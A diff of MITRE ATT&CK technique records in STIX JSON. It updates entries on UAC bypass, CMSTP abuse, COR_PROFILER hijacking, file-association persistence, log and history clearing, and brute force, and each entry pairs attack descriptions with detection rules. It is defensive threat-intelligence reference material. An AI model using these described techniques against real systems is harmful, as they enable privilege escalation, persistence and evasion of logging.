+ "x_mitre_detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.",
"x_mitre_data_sources": [
"Windows Registry",
"File monitoring",
@@ -2726,21 +2708,16 @@
"Process monitoring",
"Browser extensions"
],
- "x_mitre_detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Justin Warner, ICEBRG"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Brute Force",
+ "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -2753,10 +2730,9 @@
"url": "https://capec.mitre.org/data/definitions/49.html"
}
],
- "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.",
- "name": "Brute Force",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -2764,7 +2740,7 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-29T20:35:55.382Z",
+ "modified": "2020-07-09T17:01:18.302Z",
"created": "2017-05-31T21:31:22.767Z",
"x_mitre_platforms": [
"Linux",
@@ -2792,6 +2768,13 @@
"x_mitre_is_subtechnique": false
},
{
+ "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
+ "name": "Bypass User Access Control",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -2849,13 +2832,6 @@
"source_name": "enigma0x3 sdclt bypass"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Bypass User Access Control",
- "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
- "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -2867,7 +2843,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T12:11:48.618Z",
+ "modified": "2020-06-25T19:57:54.510Z",
"created": "2020-01-30T14:24:34.977Z",
"x_mitre_platforms": [
"Windows"
@@ -3048,7 +3024,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "CMSTP",
- "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
+ "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
"id": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -3057,20 +3033,11 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T17:19:19.483Z",
+ "modified": "2020-06-20T22:34:03.247Z",
"created": "2020-01-23T18:27:30.656Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Application whitelisting"
+ "x_mitre_contributors": [
+ "Nik Seetharaman, Palantir",
+ "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
],
"x_mitre_data_sources": [
"Windows event logs",
@@ -3078,9 +3045,105 @@
"Process command-line parameters",
"Process monitoring"
],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).",
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1574.012",
+ "url": "https://attack.mitre.org/techniques/T1574/012"
+ },
+ {
+ "source_name": "Microsoft Profiling Mar 2017",
+ "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview",
+ "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Microsoft COR_PROFILER Feb 2013",
+ "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)",
+ "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ },
+ {
+ "source_name": "Red Canary COR_PROFILER May 2020",
+ "url": "https://redcanary.com/blog/cor_profiler-for-persistence/",
+ "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Almond COR_PROFILER Apr 2019",
+ "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html",
+ "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "GitHub OmerYa Invisi-Shell",
+ "url": "https://github.com/OmerYa/Invisi-Shell",
+ "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "subTee .NET Profilers May 2017",
+ "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html",
+ "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "COR_PROFILER",
+ "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)",
+ "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-26T16:09:58.920Z",
+ "created": "2020-06-24T22:30:55.843Z",
+ "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.",
+ "x_mitre_data_sources": [
+ "Windows Registry",
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
"x_mitre_contributors": [
- "Nik Seetharaman, Palantir",
- "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
+ "Jesse Brown, Red Canary"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -3127,22 +3190,22 @@
],
"modified": "2020-03-24T20:41:08.996Z",
"created": "2020-02-21T15:42:25.991Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
"x_mitre_data_sources": [
"PowerShell logs",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nDetection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.",
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -3186,6 +3249,26 @@
"created": "2017-05-31T21:30:42.222Z"
},
{
+ "created": "2020-01-24T13:40:47.282Z",
+ "modified": "2020-01-24T13:40:47.282Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c",
+ "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)",
+ "name": "Change Default File Association",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -3218,26 +3301,6 @@
"source_name": "TrendMicro TROJ-FAKEAV OCT 2012"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Change Default File Association",
- "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)",
- "id": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- }
- ],
- "modified": "2020-01-24T13:40:47.282Z",
- "created": "2020-01-24T13:40:47.282Z",
"x_mitre_platforms": [
"Windows"
],
@@ -3278,8 +3341,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.003",
- "url": "https://attack.mitre.org/techniques/T1551/003"
+ "external_id": "T1070.003",
+ "url": "https://attack.mitre.org/techniques/T1070/003"
}
],
"object_marking_refs": [
@@ -3298,31 +3361,31 @@
],
"modified": "2020-03-29T21:31:03.043Z",
"created": "2020-01-31T12:32:08.228Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_data_sources": [
- "File monitoring",
- "Authentication logs"
- ],
- "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the ~/.bash_history file are indicators of suspicious activity.",
"x_mitre_defense_bypassed": [
"Host forensic analysis",
"Log analysis"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the ~/.bash_history file are indicators of suspicious activity.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Authentication logs"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.002",
- "url": "https://attack.mitre.org/techniques/T1551/002"
+ "external_id": "T1070.002",
+ "url": "https://attack.mitre.org/techniques/T1070/002"
},
{
"source_name": "Linux Logs",
@@ -3346,25 +3409,25 @@
],
"modified": "2020-03-29T21:23:51.886Z",
"created": "2020-01-28T17:11:54.034Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.001",
- "url": "https://attack.mitre.org/techniques/T1551/001"
+ "external_id": "T1070.001",
+ "url": "https://attack.mitre.org/techniques/T1070/001"
},
{
"url": "https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil",
@@ -3398,29 +3461,29 @@
],
"modified": "2020-03-29T21:17:03.732Z",
"created": "2020-01-28T17:05:14.707Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_data_sources": [
- "API monitoring",
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Clearing the Windows event logs requires Administrator permissions"
],
"x_mitre_defense_bypassed": [
"Anti Virus",
"Host Intrusion Prevention Systems",
"Log Analysis"
],
- "x_mitre_system_requirements": [
- "Clearing the Windows event logs requires Administrator permissions"
+ "x_mitre_permissions_required": [
+ "Administrator"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").",
+ "x_mitre_data_sources": [
+ "API monitoring",
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
@@ -3444,7 +3507,7 @@
"source_name": "MSDN Clipboard"
},
{
- "url": "http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/",
+ "url": "https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363",
"description": "rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.",
"source_name": "Operating with EmPyre"
}
@@ -3459,19 +3522,19 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-23T23:55:08.013Z",
+ "modified": "2020-04-23T18:35:58.230Z",
"created": "2017-05-31T21:31:25.967Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "API monitoring"
- ],
- "x_mitre_detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.",
+ "x_mitre_data_sources": [
+ "API monitoring"
+ ],
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -3522,29 +3585,29 @@
],
"modified": "2020-03-24T12:44:27.995Z",
"created": "2020-01-29T17:32:30.711Z",
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure",
- "Office 365",
- "Azure AD"
- ],
- "x_mitre_contributors": [
- "Praetorian",
- "Microsoft Threat Intelligence Center (MSTIC)"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_contributors": [
+ "Praetorian",
+ "Microsoft Threat Intelligence Center (MSTIC)"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
